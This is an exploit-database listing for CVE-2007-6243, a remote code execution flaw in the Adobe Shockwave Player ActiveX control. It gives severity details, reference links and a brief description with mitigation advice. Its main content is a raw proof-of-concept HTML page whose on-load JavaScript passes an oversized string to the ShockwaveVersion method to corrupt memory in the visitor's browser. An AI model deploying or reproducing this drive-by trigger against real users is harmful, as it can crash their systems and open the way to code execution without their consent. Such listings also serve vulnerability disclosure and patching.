header-logo
Suggest Exploit
vendor:
Shockwave Player
by:
milw0rm.com
9.3
CVSS
CRITICAL
Remote Code Execution
119
CWE
Product Name: Shockwave Player
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2007-6243
CPE: a:adobe:shockwave_player
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0945/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0980/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0221/https://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb08-11-cve-2007-6243/https://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb08-18-cve-2007-6243/https://www.rapid7.com/db/vulnerabilities/apple-osx-flashplayerplugin-cve-2007-6243/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-6243/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-6243/
Other Scripts:
Platforms Tested:
2007

ActiveX Control Shockwave Version Remote Code Execution

The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Shockwave Player when a user visits a malicious website. The specific flaw exists within the handling of the ShockwaveVersion method. By passing an overly long string to this function an attacker can corrupt memory in such a way that when the method returns it will reference invalid memory. An attacker can leverage this vulnerability to execute code under the context of the user running the browser.

Mitigation:

To mitigate this vulnerability, users should apply the latest updates from Adobe.
Source

Exploit-DB raw data:

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";
     while (s.length < 768 * 768) s=s+s;
  
     var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}     

     obj.ShockwaveVersion(s);
    }
  </script>

 </head>  
 <body onload="JavaScript: return Check();" />
</html>

# milw0rm.com [2007-11-08]

Navigation

Suggest Exploit

Services By CQR